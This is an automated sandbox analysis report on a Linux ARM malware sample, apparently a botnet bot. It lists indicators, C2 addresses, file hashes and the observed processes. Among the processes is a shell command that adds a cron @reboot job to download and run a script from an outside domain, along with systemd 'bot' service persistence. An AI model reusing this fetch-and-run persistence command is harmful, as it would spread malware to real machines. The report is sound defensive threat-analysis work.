Analysis Overview
SHA256
3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681
Threat Level: Shows suspicious behavior
The file arm7-20241104-0018.elf was found to show suspicious behavior.
Malicious Activity Summary
Renames itself
Unexpected DNS network traffic destination
File and Directory Permissions Modification
Modifies systemd
Creates/modifies Cron job
Changes its process name
Command and Scripting Interpreter: Unix Shell
Reads runtime system information
Enumerates kernel/hardware configuration
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-04 00:19
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-04 00:19
Reported
2024-11-04 00:21
Platform
debian9-armhf-20240611-en
Max time kernel
139s
Max time network
145s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | /bin/sh | N/A |
Renames itself
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | /tmp/arm7-20241104-0018.elf | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Destination IP | 5.161.109.23 | N/A | N/A |
| Destination IP | 139.84.165.176 | N/A | N/A |
| Destination IP | 137.220.52.23 | N/A | N/A |
| Destination IP | 152.53.15.127 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | /var/spool/cron/crontabs/tmp.vk0Due | /usr/bin/crontab | N/A |
Modifies systemd
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | /lib/systemd/system/bot.service | /tmp/arm7-20241104-0018.elf | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Changes the process name, possibly in an attempt to hide itself | /bin/busybox ntpd | /tmp/arm7-20241104-0018.elf | N/A |
Command and Scripting Interpreter: Unix Shell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /bin/sh | N/A |
Enumerates kernel/hardware configuration
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for reading | /sys/fs/kdbus/0-system/bus | /bin/systemctl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for reading | /proc/mounts | /tmp/arm7-20241104-0018.elf | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/filesystems | /bin/systemctl | N/A |
| File opened for reading | /proc/self/stat | /bin/systemctl | N/A |
| File opened for reading | /proc/1/environ | /bin/systemctl | N/A |
| File opened for reading | /proc/cmdline | /bin/systemctl | N/A |
Processes
/tmp/arm7-20241104-0018.elf
[/tmp/arm7-20241104-0018.elf]
/bin/sh
[/bin/sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
/bin/sh
[/bin/sh -c /sbin/initctl start bot]
/sbin/initctl
[/sbin/initctl start bot]
/bin/sh
[/bin/sh -c /bin/systemctl enable bot]
/bin/systemctl
[/bin/systemctl enable bot]
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 5.161.109.23:53 | kingstonwikkerink.dyn | udp |
| IN | 139.84.165.176:53 | kingstonwikkerink.dyn | udp |
| CA | 137.220.52.23:53 | kingstonwikkerink.dyn | udp |
| DE | 152.53.15.127:53 | kingstonwikkerink.dyn | udp |
| HK | 193.233.193.45:21839 | kingstonwikkerink.dyn | tcp |
Files
/var/spool/cron/crontabs/tmp.vk0Due
| Hash | Value |
| --- | --- |
| MD5 | 6834e3c196a6500f6580688b1dacc988 |
| SHA1 | 195d34d068026784f01fd201c2a31452274b6326 |
| SHA256 | ab36c9cd44fe9af93990e477994623cac5cfa400abf79321d95c524a988ee8db |
| SHA512 | 622319261091b9218d24e9baea929a7008f3f5881d17ae1b1ff3f2669767b4c3a045e80c561a7b3dae9f6cf847e76029ab14a22c592b287e5988122481d7ac83 |
/etc/init/bot.conf
| Hash | Value |
| --- | --- |
| MD5 | 9722585f219a220a4dc2a0c49bd3b019 |
| SHA1 | ffba476658ea681147c570c6f2b16a79e7d38e19 |
| SHA256 | bb41836a1f2e11795c52739e7434247d90c0f8d391afe759598baa06e3657a8d |
| SHA512 | 77f16a70995a2650a397661d7b9ce3a83f4a5c01dc6ebc5e02b60a41d425246d37ab49478dc38ee3fc956775d90e9c86f911e0ac5e5df6e142bcc82f8601d6e4 |
/lib/systemd/system/bot.service
| Hash | Value |
| --- | --- |
| MD5 | a4e30f6ce6fb6cf00e133f3c93fb5449 |
| SHA1 | 67b7de93a672ada4abfe11e339dc2e270c61b69d |
| SHA256 | a911f4bb5c69ad831fd6dc9004e52e656a846b2d7cbf152ab80c9b3928062ede |
| SHA512 | 893cda7cdcb75aceef89c64a38004feff8e5867e7bc76c622a49adfbff3fbb2c7916de6165ed4c43b4c7dabb5b56271e5a1b8a08d02b84389da92ec177289c25 |